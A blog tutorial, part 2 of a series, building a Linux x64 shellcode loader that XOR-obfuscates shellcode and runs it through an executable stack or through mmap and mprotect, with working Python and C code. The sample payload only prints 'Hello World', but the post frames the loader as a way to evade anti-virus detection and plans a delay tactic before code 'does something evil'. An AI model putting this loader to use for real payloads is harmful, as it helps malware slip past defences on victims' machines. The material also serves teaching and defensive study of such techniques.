Sun 28 January 2018

A simple, yet complete shellcode loader for linux x64 shellcode - Part 2

This post is part of a series: Part 1, Part 2.

XORing the shellcode

So far, we have not obfuscated the bytes of our shellcode at all. The first and easiest approach we want to try is XORing every byte with a constant, hardcoded key, let's say 0x41 or 'A'. The following very simple Python script prints the shellcode XORed with every possible single-byte key, and we pick the line for 0x41:

$ cat xor.py
#!/usr/bin/env python3

# This is the "Hello World!" shellcode from part 1.
shellcode = b"\xeb\x1e\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x5e\xba\x0c\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x0a"

for x in range(0, 256):
    ret = ""
    for i in bytearray(shellcode):
        xored = i ^ x
        ret = ret + ("\\x%0.2X" % xored)
    print("xored with %0.2X is \"%s\"" % (x, ret))

$ python xor.py | grep 'xored with 41'
xored with 41 is "\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B"
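
The reason a single loop is enough for both directions is that XOR with a fixed key is its own inverse: applying the same key twice yields the original bytes. A minimal sketch of that round trip, using only the first four bytes of the shellcode above (the helper name xor_bytes is made up for this illustration):

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the same single-byte key."""
    return bytes(b ^ key for b in data)

original = b"\xeb\x1e\xb8\x01"          # first four bytes of the shellcode
encoded = xor_bytes(original, 0x41)      # obfuscate
decoded = xor_bytes(encoded, 0x41)       # same operation restores the input

print(encoded.hex(), decoded == original)  # aa5ff940 True
```

Note that every 0x00 byte in the input becomes 0x41 in the output, and a byte equal to the key would become 0x00.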

Running the XORed shellcode

Ok, now that we have our XORed shellcode, we try to run it like before:

$ cat shellload_xor.c 
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<stdint.h>

// Hello World shellcode, but bytewise XORed with 0x41
const size_t len = 49 ;
const char xorKey = 0x41;
char shellcodeXOR[] =
"\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B" ;

void runShellcodeXORNaive()
{
    // decrypt with the XOR key (0x41)
    for (size_t i=0; i < len; i++) {
        printf("decrypting %zuth byte from value %u to value ", i, (uint8_t) shellcodeXOR[i]);
        char tmp = shellcodeXOR[i];
        // beware, bitwise XOR is implicitly promoting those chars to an integer!
        tmp = (tmp ^ xorKey) & 0xFF;
        shellcodeXOR[i] = tmp;
        printf("%u\n", (uint8_t) shellcodeXOR[i]);
    }
    // run decrypted shellcode
    int (*s)() = (int(*)()) shellcodeXOR;
    s();
    return;
}

int main(int argc, char* argv[])
{
    runShellcodeXORNaive();
    return 0;
}

But wait: neither of the two methods we used in part 1 to bypass Data Execution Prevention (DEP) works anymore! Why?

We cannot declare it as a constant global variable (const unsigned char[]), because we obviously need to modify the shellcode when we are XORing it back. But if we don't use const, it ends up in writable memory (the data section for a global array, the stack for a local one), which is writable, but not executable. We will get segfault 7 again, as in part 1.
The other method from part 1, namely declaring it as a string literal, does not work here either. As before, the shellcode would be put into the executable itself, which is mapped as readable and executable, but not as writable! Thus, as soon as we try to overwrite the first byte with the decrypted value, our program will crash with segmentation fault 15, as in part 1.
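
Which regions of a process are writable and which are executable can be checked on Linux in /proc/<pid>/maps, where each line carries a permission string such as rw-p or r-xp. The following is a small sketch of reading that field; the helper name parse_maps_line is invented here, and the sample line uses made-up addresses purely for illustration:

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, path)."""
    fields = line.split(None, 5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    perms = fields[1]
    # the path column is missing for anonymous mappings
    path = fields[5].strip() if len(fields) > 5 else ""
    return start, end, perms, path

# Illustrative line only, the addresses are made up
sample = "7ffc1a2b3000-7ffc1a2d4000 rw-p 00000000 00:00 0                          [stack]"
start, end, perms, path = parse_maps_line(sample)
print(path, perms, "executable" if "x" in perms else "not executable")
# [stack] rw-p not executable
```

On a Linux system, feeding the lines of /proc/self/maps through this helper lists the permissions of every mapping in the current process.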

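So, what do we do now? We can simply make the stack executable by passing the option "-z execstack" to gcc (on Linux kernels of this era, that flag also makes other readable mappings such as the data section executable), but this is kind of cheating ;) But let us verify that it works: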

$ gcc -o shellload_xor -z execstack shellload_xor.c
$ ./shellload_xor 
decrypting 0th byte from value 170 to value 235
...
decrypting 47th byte from value 37 to value 100
decrypting 48th byte from value 75 to value 10
Hello World

Using mmap to bypass protections

But there is another option that does not require any extra options like -z execstack. We can use memory-mapped pages: we allocate the pages as writable first and switch them to executable later on. After reading the man pages for mmap and mprotect, the implementation is fairly straightforward:

$ cat shellload_mmap.c 
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>

// Hello World shellcode, but XORed with 0x41
const size_t len = 49 ;
const char xorKey = 0x41;
char shellcodeXOR[] =
"\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B" ;

void runShellcodeXORmmap()
{
    // use mmap to get readable and writeable memory
    char* mem = (char*) mmap(0, len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (mem == MAP_FAILED) 
    { 
        printf("mmap failed!\n");
        exit(1);
    }

    // copy encrypted shellcode to the memory we just got from the kernel
    memcpy(mem, shellcodeXOR, len); 

    // decryption (XOR) loop
    for (size_t i=0; i<len; ++i) 
    {
        printf("decrypting %zuth byte from value %u to value ", i, (uint8_t) mem[i]);
        // beware, bitwise XOR is implicitly promoting those chars to an integer!
        mem[i] = (mem[i] ^ xorKey) & 0xFF;
        printf("%u\n", (uint8_t) mem[i]);
    }

    // use mprotect to make the memory area readable and executable
    if (mprotect(mem, len, PROT_READ|PROT_EXEC) != 0)
    {
        printf("mprotect failed!\n");
        exit(1);
    }

    // run the shellcode
    void (*s)() = (void (*)()) mem;
    s();
    // munmap is not necessary here, because our shellcode will use exit syscall 
}

int main(int argc, char* argv[])
{
    runShellcodeXORmmap();
    return 0;
}

And voila, it runs:

$ gcc -o shellload_mmap shellload_mmap.c 
$ ./shellload_mmap 
decrypting 0th byte from value 170 to value 235
...
decrypting 47th byte from value 37 to value 100
decrypting 48th byte from value 75 to value 10
Hello World
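
One detail the loader relies on implicitly: mmap and mprotect work on whole pages. We ask for only 49 bytes, but the mapping covers a full page, and mprotect changes the protection of every page that overlaps the given range. A minimal sketch of that rounding (the helper name round_up_to_page is made up for this illustration, and 4096 is only the common page size on x86-64, not a guarantee):

```python
import mmap

def round_up_to_page(length: int, page_size: int = mmap.PAGESIZE) -> int:
    """Round a byte count up to the next multiple of the page size."""
    return (length + page_size - 1) // page_size * page_size

# With an assumed 4 KiB page, the 49-byte shellcode occupies one full page
print(round_up_to_page(49, 4096))   # 4096
# Page size reported for the current system
print(mmap.PAGESIZE)
```

This is also why mprotect accepts the address returned by mmap without further work: that address is always page-aligned.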

Conclusion

Modern compilers and operating systems implement quite a few protection measures that get in the way of self-modifying code. We worked around the non-executable stack by using memory-mapped pages and were able to obfuscate our shellcode with a simple single-byte XOR.

Still, we are not finished yet and will need to tackle the following two downsides in part 3 of our tutorial. First, XOR is not real "encryption", so let us use a better encryption algorithm. Second, our program is still kind of suspicious, as it writes to a memory page which is executed later on. This may be caught by modern anti-virus heuristics. We will work around that by requiring the decryption to take 30 seconds of CPU time before our program actually does something evil. No real-time anti-virus software will be able to spend this much CPU time before finishing its analysis.

Klaus' Log
